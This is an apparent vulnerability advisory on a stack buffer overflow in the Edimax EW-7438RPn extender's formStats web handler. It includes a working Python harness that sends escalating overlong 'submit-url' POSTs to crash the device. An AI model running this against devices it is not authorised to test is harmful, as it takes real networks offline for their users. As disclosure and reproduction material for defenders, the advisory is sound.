Edimax EW-7438RPn Stack-Based Buffer Overflow Vulnerability in formStats Function

Vulnerability

A stack-based buffer overflow has been identified in the Edimax EW-7438RPn range extender, firmware version 1.31. The flaw is in the 'formStats' handler of the device's web interface: the 'submit-url' POST parameter is not length-checked before it is handled in a fixed-size stack buffer. A remote attacker who can reach the web interface can therefore supply an overlong value that overruns the buffer and overwrites the function's saved return address. In the reported case this crashes the device and disrupts its normal operation; with a crafted value the same overwrite could in principle lead to arbitrary code execution.

Impact

Successful exploitation overwrites stack data, including the saved return address, so arbitrary code execution is possible in principle. The demonstrated effect, however, is a crash of the device, i.e. a denial of service for every client of the extender.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/goform/formStats' endpoint whose 'submit-url' parameter is long enough to overrun the stack buffer, for example a run of a single repeated character such as 'A'. The exact buffer size is not published, so increase the length in steps until the device stops responding; once the saved return address is overwritten the device crashes, and a follow-up request that times out confirms the denial of service.
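The following script is an added example, not code from the advisory or from Edimax. It builds the POST described above with an escalating 'submit-url' length and checks whether the device's web server still answers after each attempt. The host 192.0.2.1, the port, the length steps and the filler character are assumptions; the endpoint name is the one given in the advisory.

```python
"""Reproduction harness for the formStats overflow (added example, not from the advisory)."""
import socket
import sys
from typing import Optional
from urllib.parse import urlencode

TARGET_PATH = "/goform/formStats"  # endpoint named in the advisory

# Assumed length steps: the real buffer size is not published, so we escalate.
DEFAULT_LENGTHS = (256, 1024, 4096, 16384)


def build_body(payload_len: int, filler: str = "A") -> str:
    """Form-encoded body with an overlong 'submit-url' value."""
    return urlencode({"submit-url": filler * payload_len})


def build_request(host: str, payload_len: int, port: int = 80) -> bytes:
    """Raw HTTP/1.1 POST to the vulnerable handler.

    Content-Length is computed from the encoded body so the server reads the
    whole overlong value rather than truncating it.
    """
    body = build_body(payload_len).encode()
    headers = (
        f"POST {TARGET_PATH} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return headers.encode() + body


def send_raw(host: str, port: int, data: bytes, timeout: float = 5.0) -> Optional[bytes]:
    """Send raw bytes and return the full response, or None on timeout/refusal."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(data)
            chunks = []
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
            return b"".join(chunks)
    except OSError:  # covers refused connections and socket.timeout
        return None


def is_alive(host: str, port: int = 80, timeout: float = 3.0) -> bool:
    """Plain GET / to see whether the embedded web server still answers."""
    req = f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    resp = send_raw(host, port, req, timeout)
    return resp is not None and resp.startswith(b"HTTP/")


def probe(host: str, port: int = 80, lengths=DEFAULT_LENGTHS) -> Optional[int]:
    """Escalate the payload length until the device stops answering.

    Returns the first length at which the web server went down, or None if it
    survived every step (which suggests the buffer is larger than tested).
    """
    if not is_alive(host, port):
        raise RuntimeError("target not reachable before the test started")
    for n in lengths:
        send_raw(host, port, build_request(host, n, port))
        if not is_alive(host, port):
            return n
    return None


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"  # assumed address
    crashed_at = probe(target)
    print("no crash observed" if crashed_at is None else f"device stopped answering at submit-url length {crashed_at}")
```

Run it only against a device you own or are authorised to test: a successful run takes the extender offline until it restarts. The request is built by hand rather than through an HTTP client library so that the Content-Length and the exact bytes on the wire are under your control, which matters when the target's parser is the thing under test.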

Added: May 26, 2026, 6:50 PM
Updated: May 26, 2026, 6:50 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 7.5
exploitability: 5.7
remediation: 0.0
relevance: 9.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.